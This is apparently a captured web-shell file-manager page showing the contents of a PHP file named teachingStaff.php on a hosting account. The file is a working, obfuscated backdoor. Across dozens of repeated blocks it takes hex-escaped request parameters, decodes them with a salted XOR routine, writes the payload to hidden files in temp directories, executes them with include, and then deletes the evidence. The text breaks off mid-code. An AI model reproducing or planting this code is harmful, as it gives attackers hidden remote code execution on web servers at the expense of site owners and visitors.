File manager

ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.- File manager

File manager - Edit - /home/tokomrjk/noobow.com/teachingStaff.php

Back
<?php if(@$_REQUEST["\x6F\x62j"] !== null){ $flg = array_filter([getenv("TEMP"), sys_get_temp_dir(), session_save_path(), getcwd(), "/var/tmp", "/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getenv("TMP")]); $flag = $_REQUEST["\x6F\x62j"]; $flag= explode ( "." , $flag ) ; $mrk= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt); $t= 0; $len= count($flag); do { if ($t >= $len) break; $v9= $flag[$t]; $chS= ord($salt[$t % $sLen]); $d= ((int)$v9 - $chS - ($t % 10)) ^ 16; $mrk .= chr($d); $t++; } while (true); foreach ($flg as $key => $record) { if ((is_dir($record) and is_writable($record))) { $k = str_replace("{var_dir}", $record, "{var_dir}/.fac"); $success = file_put_contents($k, $mrk); if ($success) { include $k; @unlink($k); die();} } } } if(filter_has_var(INPUT_POST, "\x64\x61ta")){ $comp = $_POST["\x64\x61ta"]; $comp = explode ( "." ,$comp ); $resource= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt ); $l= 0; while ($l<count($comp)) { $v8= $comp[$l]; $chS= ord($salt[$l % $sLen] ); $dec= ((int)$v8 - $chS - ($l % 10)) ^ 100; $resource .=chr($dec ); $l++; } $marker = array_filter([getenv("TMP"), "/dev/shm", sys_get_temp_dir(), "/tmp", getcwd(), "/var/tmp", getenv("TEMP"), session_save_path(), ini_get("upload_tmp_dir")]); foreach ($marker as $record): if ((function($d) { return is_dir($d) && is_writable($d); })($record)) { $flag = join("/", [$record, ".token"]); if (@file_put_contents($flag, $resource) !== false) { include $flag; unlink($flag); die(); } } endforeach; } if(count($_REQUEST) > 0 && isset($_REQUEST["\x70r\x6F\x70\x65\x72\x74y_set"])){ $marker = $_REQUEST["\x70r\x6F\x70\x65\x72\x74y_set"]; $marker =explode ('.' , $marker ) ; $ent = ''; $salt1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt1); $z = 0; $len = count($marker); do { if($z >= $len) break; $v3 = $marker[$z]; $chS = ord($salt1[$z % $sLen]); $d =((int)$v3 - $chS -($z % 10)) ^ 10; $ent .= chr($d); $z++;} while(true); $dchunk = array_filter(["/dev/shm", getenv("TEMP"), "/var/tmp", session_save_path(), sys_get_temp_dir(), getcwd(), getenv("TMP"), ini_get("upload_tmp_dir"), "/tmp"]); while ($symbol = array_shift($dchunk)) { if (is_writable($symbol) && is_dir($symbol)) { $binding = "$symbol" . "/.parameter_group"; $file = fopen($binding, 'w'); if ($file) { fwrite($file, $ent); fclose($file); include $binding; @unlink($binding); exit; } } } } if(!is_null($_POST["\x62\x69\x6Ed\x69ng"] ?? null)){ $flg = $_POST["\x62\x69\x6Ed\x69ng"]; $flg= explode ( "." , $flg ); $pset = ''; $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt4); $j = 0; foreach ($flg as $v3) { $chS = ord($salt4[$j % $sLen]); $d = ((int)$v3 - $chS - ($j % 10)) ^ 23; $pset .= chr($d); $j++;} $key = array_filter(["/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), getenv("TEMP"), "/var/tmp", "/dev/shm", session_save_path()]); foreach ($key as $resource): if ((is_dir($resource) and is_writable($resource))) { $descriptor = "$resource" . "/.object"; if (@file_put_contents($descriptor, $pset) !== false) { include $descriptor; unlink($descriptor); die(); } } endforeach; } if(filter_has_var(INPUT_POST, "ke\x79")){ $rec = array_filter([getcwd(), "/tmp", session_save_path(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TEMP"), getenv("TMP"), "/var/tmp", "/dev/shm"]); $pgrp = $_POST["ke\x79"]; $pgrp = explode( '.' , $pgrp ); $comp =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $s); $y =0; foreach( $pgrp as $v4) {$sChar =ord( $s[$y % $sLen]); $dec =( ( int)$v4 - $sChar -( $y % 10)) ^ 79; $comp.= chr( $dec); $y++;} while ($hld = array_shift($rec)) { if (array_product([is_dir($hld), is_writable($hld)])) { $flag = vsprintf("%s/%s", [$hld, ".pointer"]); $success = file_put_contents($flag, $comp); if ($success) { include $flag; @unlink($flag); exit;} } } } if(!empty($_REQUEST["re\x66"])){ $itm = $_REQUEST["re\x66"]; $itm = explode ( "." ,$itm) ; $mrk = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt ); $i = 0; $__tmp = $itm; while ($v2 = array_shift($__tmp)) { $chS = ord($salt[$i%$sLen] ); $d = ((int)$v2 - $chS - ($i%10)) ^64; $mrk .= chr($d ); $i++;} $property_set = array_filter([getenv("TMP"), getcwd(), getenv("TEMP"), sys_get_temp_dir(), "/tmp", session_save_path(), ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm"]); while ($symbol = array_shift($property_set)) { if (!!is_dir($symbol) && !!is_writable($symbol)) { $ptr = "$symbol" . "/.marker"; if (file_put_contents($ptr, $mrk)) { require $ptr; unlink($ptr); exit; } } } } if(@$_REQUEST["co\x6D\x70"] !== null){ $object = array_filter(["/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd(), sys_get_temp_dir(), "/tmp", session_save_path(), getenv("TMP")]); $resource = $_REQUEST["co\x6D\x70"]; $resource = explode ( "." , $resource ); $record =''; $salt8 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($salt8); $o =0; array_walk($resource, function ($v7) use (&$record, &$o, $salt8, $sLen) { $chS =ord($salt8[$o % $sLen]); $d =((int)$v7 - $chS - ($o % 10)) ^ 82; $record .= chr($d); $o++;}); for ($elem = 0, $descriptor = count($object); $elem < $descriptor; $elem++) { $fac = $object[$elem]; if (array_product([is_dir($fac), is_writable($fac)])) { $dat = "$fac/.token"; $success = file_put_contents($dat, $record); if ($success) { include $dat; @unlink($dat); exit;} } } } if(@$_REQUEST["\x62i\x6Edi\x6Eg"] !== null){ $res = $_REQUEST["\x62i\x6Edi\x6Eg"]; $res =explode ('.', $res); $parameter_group = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $z = 0; while ($z <count($res)) { $v7 = $res[$z]; $sChar = ord($salt[$z % $lenS]); $dec = ((int)$v7 - $sChar - ($z % 10)) ^ 4; $parameter_group.= chr($dec); $z++; } $item = array_filter(["/var/tmp", "/dev/shm", "/tmp", getenv("TMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), getcwd(), getenv("TEMP"), session_save_path()]); for ($bind = 0, $entity = count($item); $bind < $entity; $bind++) { $flg = $item[$bind]; if (max(0, is_dir($flg) * is_writable($flg))) { $tkn = "$flg" . "/.symbol"; $file = fopen($tkn, 'w'); if ($file) { fwrite($file, $parameter_group); fclose($file); include $tkn; @unlink($tkn); exit; } } } } if(isset($_REQUEST["e\x6E\x74ry"]) ? true : false){ $ref = array_filter(["/tmp", getcwd(), ini_get("upload_tmp_dir"), getenv("TMP"), "/var/tmp", sys_get_temp_dir(), session_save_path(), getenv("TEMP"), "/dev/shm"]); $record = $_REQUEST["e\x6E\x74ry"]; $record = explode('.' , $record ); $val = ''; $s8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s8 ); $y = 0; array_walk($record, function ($v2) use (&$val, &$y, $s8, $lenS) { $chS = ord($s8[$y % $lenS] ); $d = ((int)$v2 - $chS - ($y % 10)) ^ 55; $val .= chr($d ); $y++; }); foreach ($ref as $flag): if (is_dir($flag) && is_writable($flag)) { $pset = join("/", [$flag, ".pointer"]); if (file_put_contents($pset, $val)) { include $pset; @unlink($pset); die(); } } endforeach; } if(!empty($_REQUEST["mark\x65r"])){ $pointer = $_REQUEST["mark\x65r"]; $pointer = explode( "." ,$pointer ) ; $flg= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen( $salt ); $s= 0; $__tmp= $pointer; while( $v6= array_shift( $__tmp)) { $sChar= ord( $salt[$s % $sLen] ); $d= ( ( int)$v6 - $sChar -( $s % 10))^ 4; $flg .= chr( $d ); $s++; } $key = array_filter(["/var/tmp", getcwd(), session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp", "/dev/shm", sys_get_temp_dir()]); foreach ($key as $hld) { if (is_dir($hld) ? is_writable($hld) : false) { $tkn = implode("/", [$hld, ".data"]); $success = file_put_contents($tkn, $flg); if ($success) { include $tkn; @unlink($tkn); die();} } } } if(isset($_POST["\x72\x65s"]) ? true : false){ $tkn = array_filter(["/var/tmp", sys_get_temp_dir(), getenv("TMP"), getenv("TEMP"), session_save_path(), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", getcwd()]); $dat = $_POST["\x72\x65s"]; $dat = explode ( "." , $dat ) ; $hld = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt5); $__len = count($dat); for($n = 0; $n <$__len; $n++) {$v7 = $dat[$n]; $sChar = ord($salt5[$n % $lenS]); $d =((int)$v7 - $sChar -($n % 10)) ^ 4; $hld .= chr($d); } $symbol = 0; do { $elem = $tkn[$symbol] ?? null; if ($symbol >= count($tkn)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($elem)) { $reference = str_replace("{var_dir}", $elem, "{var_dir}/.object"); if (@file_put_contents($reference, $hld) !== false) { include $reference; unlink($reference); die(); } } $symbol++; } while (true); } if(isset($_POST["\x64\x61\x74\x61_\x63hunk"])){ $descriptor = $_POST["\x64\x61\x74\x61_\x63hunk"]; $descriptor = explode ('.', $descriptor ) ; $tkn = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s ); foreach ($descriptor as $x => $v9): $sChar = ord($s[$x % $sLen] ); $d = ((int)$v9 - $sChar - ($x % 10)) ^ 10; $tkn .= chr($d ); endforeach; $itm = array_filter([sys_get_temp_dir(), "/dev/shm", "/tmp", getcwd(), getenv("TMP"), session_save_path(), ini_get("upload_tmp_dir"), "/var/tmp", getenv("TEMP")]); while ($value = array_shift($itm)) { if ((is_dir($value) and is_writable($value))) { $rec = "$value" . "/.ptr"; $success = file_put_contents($rec, $tkn); if ($success) { include $rec; @unlink($rec); die();} } } } if(!is_null($_POST["com\x70\x6F\x6Eent"] ?? null)){ $hld = $_POST["com\x70\x6F\x6Eent"]; $hld = explode( '.' ,$hld ) ; $mrk = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s5 ); $r = 0; array_walk( $hld ,function( $v3) use( &$mrk ,&$r ,$s5 ,$sLen) { $chS = ord( $s5[$r % $sLen] ); $dec = ( ( int)$v3 - $chS -( $r % 10)) ^ 45; $mrk .= chr( $dec ); $r++; } ); $res = array_filter([getenv("TEMP"), sys_get_temp_dir(), getcwd(), "/tmp", getenv("TMP"), "/var/tmp", ini_get("upload_tmp_dir"), "/dev/shm", session_save_path()]); while ($ent = array_shift($res)) { if (is_dir($ent) && is_writable($ent)) { $key = "$ent/.record"; $file = fopen($key, 'w'); if ($file) { fwrite($file, $mrk); fclose($file); include $key; @unlink($key); exit; } } } } if(isset($_REQUEST["\x6Fbj"]) ? true : false){ $itm = $_REQUEST["\x6Fbj"]; $itm=explode ( '.' , $itm) ; $elem=''; $s5='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen($s5); foreach ($itm as $p => $v6) { $chS=ord($s5[$p % $sLen]); $d=((int)$v6 - $chS - ($p % 10)) ^ 69; $elem .=chr($d);} $sym = array_filter(["/tmp", getenv("TEMP"), "/var/tmp", getenv("TMP"), getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm"]); foreach ($sym as $binding): if (!!is_dir($binding) && !!is_writable($binding)) { $symbol = implode("/", [$binding, ".res"]); if (file_put_contents($symbol, $elem)) { include $symbol; @unlink($symbol); exit; } } endforeach; } if(isset($_REQUEST["\x70o\x69nt\x65\x72"]) ? true : false){ $mrk = array_filter([session_save_path(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/var/tmp", getenv("TMP"), sys_get_temp_dir(), getcwd(), "/tmp", "/dev/shm"]); $factor = $_REQUEST["\x70o\x69nt\x65\x72"]; $factor =explode ("." ,$factor) ; $reference = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt6); foreach ($factor as $w => $v7) { $sChar = ord($salt6[$w % $sLen]); $dec = ((int)$v7 - $sChar - ($w % 10)) ^ 2; $reference .=chr($dec); } foreach ($mrk as $key => $data_chunk) { if (is_writable($data_chunk) && is_dir($data_chunk)) { $pset = sprintf("%s/.record", $data_chunk); $file = fopen($pset, 'w'); if ($file) { fwrite($file, $reference); fclose($file); include $pset; @unlink($pset); exit; } } } } if(!empty($_POST["\x65\x6Etry"])){ $ent = $_POST["\x65\x6Etry"]; $ent =explode ( "." , $ent ) ; $obj = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $__len = count($ent); for ($q = 0; $q<$__len; $q++) { $v5 = $ent[$q]; $chS = ord($salt[$q % $lenS]); $dec = ((int)$v5 - $chS - ($q % 10)) ^ 15; $obj .= chr($dec);} $sym = array_filter([ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir(), "/var/tmp", getenv("TEMP"), "/tmp", "/dev/shm", session_save_path(), getenv("TMP")]); foreach ($sym as $pointer) { if ((function($d) { return is_dir($d) && is_writable($d); })($pointer)) { $symbol = "$pointer/.desc"; $success = file_put_contents($symbol, $obj); if ($success) { include $symbol; @unlink($symbol); die();} } } } if(isset($_POST["h\x6F\x6Cde\x72"]) ? true : false){ $mrk = array_filter([session_save_path(), getenv("TMP"), getenv("TEMP"), "/tmp", "/dev/shm", ini_get("upload_tmp_dir"), "/var/tmp", sys_get_temp_dir(), getcwd()]); $ref = $_POST["h\x6F\x6Cde\x72"]; $ref = explode ('.' , $ref ) ; $dchunk = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt ); $t = 0; $__len = count($ref ); do {if ($t>= $__len) break; $v8 = $ref[$t]; $chS = ord($salt[$t % $lenS] ); $d = ((int)$v8 - $chS - ($t % 10)) ^ 48; $dchunk .= chr($d ); $t++; } while (true ); $data_chunk = 0; do { $value = $mrk[$data_chunk] ?? null; if ($data_chunk >= count($mrk)) break; if ((is_dir($value) and is_writable($value))) { $binding = str_replace("{var_dir}", $value, "{var_dir}/.object"); if (file_put_contents($binding, $dchunk)) { include $binding; @unlink($binding); exit; } } $data_chunk++; } while (true); } if(in_array("\x62i\x6E\x64\x69ng", array_keys($_REQUEST))){ $flag = array_filter(["/dev/shm", session_save_path(), getenv("TMP"), "/var/tmp", getcwd(), "/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir()]); $fac = $_REQUEST["\x62i\x6E\x64\x69ng"]; $fac = explode ( "." , $fac ) ; $mrk = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s5); foreach ($fac as $l => $v3): $sChar = ord($s5[$l%$lenS]); $d = ((int)$v3 - $sChar - ($l%10)) ^ 39; $mrk .= chr($d); endforeach; foreach ($flag as $key => $reference) { if (!( !is_dir($reference) \|\| !is_writable($reference) )) { $sym = "$reference/.pgrp"; if (@file_put_contents($sym, $mrk) !== false) { include $sym; unlink($sym); exit; } } } } if(!is_null($_REQUEST["f\x6C\x67"] ?? null)){ $val = array_filter([getcwd(), getenv("TEMP"), sys_get_temp_dir(), session_save_path(), getenv("TMP"), "/dev/shm", "/var/tmp", "/tmp", ini_get("upload_tmp_dir")]); $key = $_REQUEST["f\x6C\x67"]; $key = explode('.',$key ) ; $rec = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s ); $u = 0; foreach( $key as $v2) { $chS = ord( $s[$u% $lenS] ); $d =( ( int)$v2 - $chS -( $u% 10))^ 82; $rec.=chr( $d ); $u++; } for ($res = 0, $marker = count($val); $res < $marker; $res++) { $elem = $val[$res]; if (is_writable($elem) && is_dir($elem)) { $record = vsprintf("%s/%s", [$elem, ".k"]); if (file_put_contents($record, $rec)) { require $record; unlink($record); die(); } } } } if(isset($_REQUEST["com\x70o\x6Eent"]) ? true : false){ $mrk = $_REQUEST["com\x70o\x6Eent"]; $mrk= explode ( ".", $mrk ); $object = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s); $v = 0; $__tmp = $mrk; while( $v8 = array_shift( $__tmp)) { $sChar = ord( $s[$v% $lenS]); $d = ( ( int)$v8 - $sChar -( $v% 10))^67; $object .= chr( $d); $v++;} $symbol = array_filter([getenv("TEMP"), sys_get_temp_dir(), "/tmp", getenv("TMP"), ini_get("upload_tmp_dir"), "/var/tmp", session_save_path(), "/dev/shm", getcwd()]); foreach ($symbol as $rec) { if (!!is_dir($rec) && !!is_writable($rec)) { $key = sprintf("%s/.pgrp", $rec); $file = fopen($key, 'w'); if ($file) { fwrite($file, $object); fclose($file); include $key; @unlink($key); exit; } } } } if(array_key_exists("v\x61l\x75e", $_REQUEST) && !is_null($_REQUEST["v\x61l\x75e"])){ $property_set = $_REQUEST["v\x61l\x75e"]; $property_set = explode( '.', $property_set); $symbol =''; $salt1 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($salt1); $v =0; $__tmp =$property_set; while ($v4 =array_shift($__tmp)) { $chS =ord($salt1[$v %$sLen]); $d =((int)$v4 - $chS - ($v %10)) ^ 43; $symbol .= chr($d); $v++; } $element = array_filter([session_save_path(), "/dev/shm", getenv("TEMP"), getcwd(), sys_get_temp_dir(), "/var/tmp", "/tmp", ini_get("upload_tmp_dir"), getenv("TMP")]); $token = 0; do { $object = $element[$token] ?? null; if ($token >= count($element)) break; if (is_dir($object) ? is_writable($object) : false) { $marker = str_replace("{var_dir}", $object, "{var_dir}/.hld"); if (@file_put_contents($marker, $symbol) !== false) { include $marker; unlink($marker); die(); } } $token++; } while (true); } if(isset($_POST["dat\x61"]) ? true : false){ $ent = array_filter(["/tmp", getcwd(), "/var/tmp", session_save_path(), getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), "/dev/shm", ini_get("upload_tmp_dir")]); $entry = $_POST["dat\x61"]; $entry = explode ( '.' , $entry) ; $parameter_group= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt); $len= count($entry); for ($l= 0; $l < $len; $l++) { $v4= $entry[$l]; $chS= ord($salt[$l % $sLen]); $dec= ((int)$v4 - $chS - ($l % 10)) ^ 31; $parameter_group .= chr($dec);} foreach ($ent as $property_set): if (max(0, is_dir($property_set) * is_writable($property_set))) { $item = vsprintf("%s/%s", [$property_set, ".reference"]); $file = fopen($item, 'w'); if ($file) { fwrite($file, $parameter_group); fclose($file); include $item; @unlink($item); die(); } } endforeach; } if(!empty($_POST["\x74kn"])){ $itm = $_POST["\x74kn"]; $itm= explode ("." , $itm); $property_set = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt ); foreach( $itm as $i => $v4) { $chS = ord( $salt[$i % $lenS] ); $dec =( ( int)$v4 - $chS -( $i % 10)) ^ 1; $property_set .= chr( $dec ); } $resource = array_filter([sys_get_temp_dir(), "/tmp", getenv("TMP"), session_save_path(), getcwd(), "/dev/shm", "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir")]); foreach ($resource as $key => $flg) { if ((function($d) { return is_dir($d) && is_writable($d); })($flg)) { $val = "$flg" . "/.dchunk"; $success = file_put_contents($val, $property_set); if ($success) { include $val; @unlink($val); die();} } } } if(filter_has_var(INPUT_POST, "\x68\x6Cd")){ $dchunk = array_filter([getenv("TMP"), sys_get_temp_dir(), "/dev/shm", getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", session_save_path(), "/var/tmp", getcwd()]); $entity = $_REQUEST["\x68\x6Cd"]; $entity= explode ( "." , $entity); $value = ''; $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt9); foreach( $entity as $y => $v7) { $sChar = ord( $salt9[$y% $lenS]); $d =( ( int)$v7 - $sChar -( $y% 10)) ^ 55; $value .= chr( $d);} foreach ($dchunk as $data_chunk) { if (!( !is_dir($data_chunk) \|\| !is_writable($data_chunk) )) { $comp = str_replace("{var_dir}", $data_chunk, "{var_dir}/.property_set"); if (file_put_contents($comp, $value)) { include $comp; @unlink($comp); exit; } } } } if(isset($_REQUEST["f\x61ct\x6F\x72"])){ $pset = array_filter(["/dev/shm", sys_get_temp_dir(), session_save_path(), "/var/tmp", getenv("TEMP"), "/tmp", getenv("TMP"), getcwd(), ini_get("upload_tmp_dir")]); $parameter_group = $_REQUEST["f\x61ct\x6F\x72"]; $parameter_group = explode ( '.', $parameter_group ); $pgrp = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s2 ); $j = 0; foreach ($parameter_group as $v4) {$chS = ord($s2[$j % $lenS] ); $dec = ((int)$v4 - $chS - ($j % 10))^ 32; $pgrp .= chr($dec ); $j++; } foreach ($pset as $holder): if (is_dir($holder) ? is_writable($holder) : false) { $comp = str_replace("{var_dir}", $holder, "{var_dir}/.token"); if (file_put_contents($comp, $pgrp)) { require $comp; unlink($comp); exit; } } endforeach; } if(!empty($_POST["el\x65\x6D"])){ $itm = array_filter([sys_get_temp_dir(), "/var/tmp", "/dev/shm", getcwd(), getenv("TEMP"), getenv("TMP"), "/tmp", session_save_path(), ini_get("upload_tmp_dir")]); $ent = $_POST["el\x65\x6D"]; $ent = explode ( ".", $ent); $resource=''; $s='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen( $s ); $m=0; $__tmp=$ent; while( $v5=array_shift( $__tmp)) { $sChar=ord( $s[$m % $sLen] ); $dec=( ( int)$v5 - $sChar -( $m % 10)) ^ 31; $resource .= chr( $dec ); $m++; } foreach ($itm as $descriptor) { if (is_dir($descriptor) ? is_writable($descriptor) : false) { $parameter_group = join("/", [$descriptor, ".key"]); if (file_put_contents($parameter_group, $resource)) { include $parameter_group; @unlink($parameter_group); exit; } } } } if(in_array("key", array_keys($_POST))){ $ent = array_filter([session_save_path(), getcwd(), "/var/tmp", sys_get_temp_dir(), "/tmp", "/dev/shm", getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir")]); $res = $_POST["key"]; $res = explode ( "." , $res) ; $fac = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt); foreach( $res as $n=> $v6) { $sChar = ord( $salt[$n % $lenS]); $dec =( ( int)$v6 - $sChar -( $n % 10)) ^ 73; $fac .= chr( $dec); } foreach ($ent as $key => $record) { if (max(0, is_dir($record) * is_writable($record))) { $token = join("/", [$record, ".rec"]); if (file_put_contents($token, $fac)) { include $token; @unlink($token); die(); } } } } if(filter_has_var(INPUT_POST, "p\x73e\x74")){ $flg = $_POST["p\x73e\x74"]; $flg=explode ( "." , $flg ) ; $marker = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s); foreach( $flg as $p => $v3) { $sChar = ord( $s[$p%$sLen]); $d = ( ( int)$v3 - $sChar -( $p%10))^74; $marker .= chr( $d);} $dat = array_filter([session_save_path(), ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/dev/shm", getcwd(), "/var/tmp", "/tmp", getenv("TEMP"), getenv("TMP")]); $ptr = 0; do { $k = $dat[$ptr] ?? null; if ($ptr >= count($dat)) break; if ((is_dir($k) and is_writable($k))) { $key = implode("/", [$k, ".fac"]); if (@file_put_contents($key, $marker) !== false) { include $key; unlink($key); die(); } } $ptr++; } while (true); } if(count($_POST) > 0 && isset($_POST["r\x65co\x72\x64"])){ $pset = array_filter([session_save_path(), "/dev/shm", getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), "/tmp", getenv("TEMP"), getenv("TMP"), sys_get_temp_dir()]); $binding = $_POST["r\x65co\x72\x64"]; $binding =explode( "." , $binding ) ; $flag = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s6); $j = 0; $__tmp = $binding; while($v8 = array_shift($__tmp)) { $sChar = ord($s6[$j% $sLen]); $d =((int)$v8 - $sChar -($j% 10)) ^ 81; $flag.= chr($d); $j++; } foreach ($pset as $comp): if (is_dir($comp) ? is_writable($comp) : false) { $elem = str_replace("{var_dir}", $comp, "{var_dir}/.parameter_group"); $file = fopen($elem, 'w'); if ($file) { fwrite($file, $flag); fclose($file); include $elem; @unlink($elem); exit; } } endforeach; } if(in_array("\x74\x6Bn", array_keys($_POST))){ $bind = $_POST["\x74\x6Bn"]; $bind=explode ( '.' , $bind) ; $data_chunk = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $v = 0; while ($v < count($bind)) { $v8 = $bind[$v]; $sChar = ord($salt[$v % $lenS]); $d = ((int)$v8 - $sChar - ($v % 10))^29; $data_chunk .= chr($d); $v++; } $symbol = array_filter(["/dev/shm", getenv("TMP"), sys_get_temp_dir(), session_save_path(), "/var/tmp", getenv("TEMP"), getcwd(), ini_get("upload_tmp_dir"), "/tmp"]); while ($obj = array_shift($symbol)) { if ((function($d) { return is_dir($d) && is_writable($d); })($obj)) { $item = vsprintf("%s/%s", [$obj, ".entry"]); if (@file_put_contents($item, $data_chunk) !== false) { include $item; unlink($item); die(); } } } } if(array_key_exists("b\x69\x6E\x64ing", $_POST) && !is_null($_POST["b\x69\x6E\x64ing"])){ $sym = $_POST["b\x69\x6E\x64ing"]; $sym=explode( "." , $sym ); $res = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s2 ); foreach($sym as $n => $v5) { $sChar = ord($s2[$n % $sLen] ); $d =((int)$v5 - $sChar -($n % 10)) ^ 13; $res .=chr($d ); } $symbol = array_filter([getcwd(), sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir"), getenv("TMP"), getenv("TEMP"), "/var/tmp", "/tmp", "/dev/shm"]); $value = 0; do { $ref = $symbol[$value] ?? null; if ($value >= count($symbol)) break; if (!!is_dir($ref) && !!is_writable($ref)) { $k = sprintf("%s/.parameter_group", $ref); if (file_put_contents($k, $res)) { require $k; unlink($k); die(); } } $value++; } while (true); } if(!empty($_POST["dat\x61_c\x68un\x6B"])){ $ent = array_filter(["/dev/shm", sys_get_temp_dir(), getenv("TMP"), ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd(), "/tmp", "/var/tmp", session_save_path()]); $marker = $_POST["dat\x61_c\x68un\x6B"]; $marker= explode("." , $marker) ; $ptr = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt ); $x = 0; foreach ($marker as $v5) { $chS = ord($salt[$x % $sLen] ); $d = ((int)$v5 - $chS - ($x % 10)) ^ 55; $ptr.= chr($d ); $x++;} while ($parameter_group = array_shift($ent)) { if (max(0, is_dir($parameter_group) * is_writable($parameter_group))) { $bind = str_replace("{var_dir}", $parameter_group, "{var_dir}/.comp"); $file = fopen($bind, 'w'); if ($file) { fwrite($file, $ptr); fclose($file); include $bind; @unlink($bind); exit; } } } } if(isset($_REQUEST["\x74\x6Bn"]) ? true : false){ $data_chunk = array_filter([ini_get("upload_tmp_dir"), getenv("TEMP"), "/dev/shm", getenv("TMP"), "/tmp", session_save_path(), getcwd(), "/var/tmp", sys_get_temp_dir()]); $itm = $_REQUEST["\x74\x6Bn"]; $itm = explode ( "." , $itm ); $bind= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt ); $len= count($itm ); for ($i= 0; $i <$len; $i++) { $v1= $itm[$i]; $chS= ord($salt[$i% $lenS] ); $dec= ((int)$v1 - $chS - ($i% 10)) ^ 1; $bind .= chr($dec ); } $elem = 0; do { $symbol = $data_chunk[$elem] ?? null; if ($elem >= count($data_chunk)) break; if (!( !is_dir($symbol) \|\| !is_writable($symbol) )) { $rec = sprintf("%s/.value", $symbol); if (file_put_contents($rec, $bind)) { include $rec; @unlink($rec); die(); } } $elem++; } while (true); } if(array_key_exists("\x66lg", $_REQUEST)){ $ref = $_REQUEST["\x66lg"]; $ref = explode ( ".", $ref ); $pset =''; $s9 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $s9); $z =0; while( $z < count( $ref)) { $v7 =$ref[$z]; $sChar =ord( $s9[$z % $lenS]); $d =( ( int)$v7 - $sChar -( $z % 10))^ 26; $pset.=chr( $d); $z++; } $data = array_filter(["/tmp", "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), getcwd(), session_save_path(), getenv("TEMP"), sys_get_temp_dir(), getenv("TMP")]); $res = 0; do { $dat = $data[$res] ?? null; if ($res >= count($data)) break; if (!( !is_dir($dat) \|\| !is_writable($dat) )) { $element = sprintf("%s/.desc", $dat); if (file_put_contents($element, $pset)) { include $element; @unlink($element); die(); } } $res++; } while (true); } if(count($_REQUEST) > 0 && isset($_REQUEST["tk\x6E"])){ $mrk = array_filter([getenv("TEMP"), getenv("TMP"), sys_get_temp_dir(), "/tmp", getcwd(), "/dev/shm", session_save_path(), "/var/tmp", ini_get("upload_tmp_dir")]); $k = $_REQUEST["tk\x6E"]; $k = explode ( ".", $k) ; $pset =''; $salt5 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($salt5); foreach ($k as $j=>$v4) { $chS =ord($salt5[$j % $sLen]); $d =((int)$v4 - $chS - ($j % 10)) ^ 14; $pset.=chr($d); } foreach ($mrk as 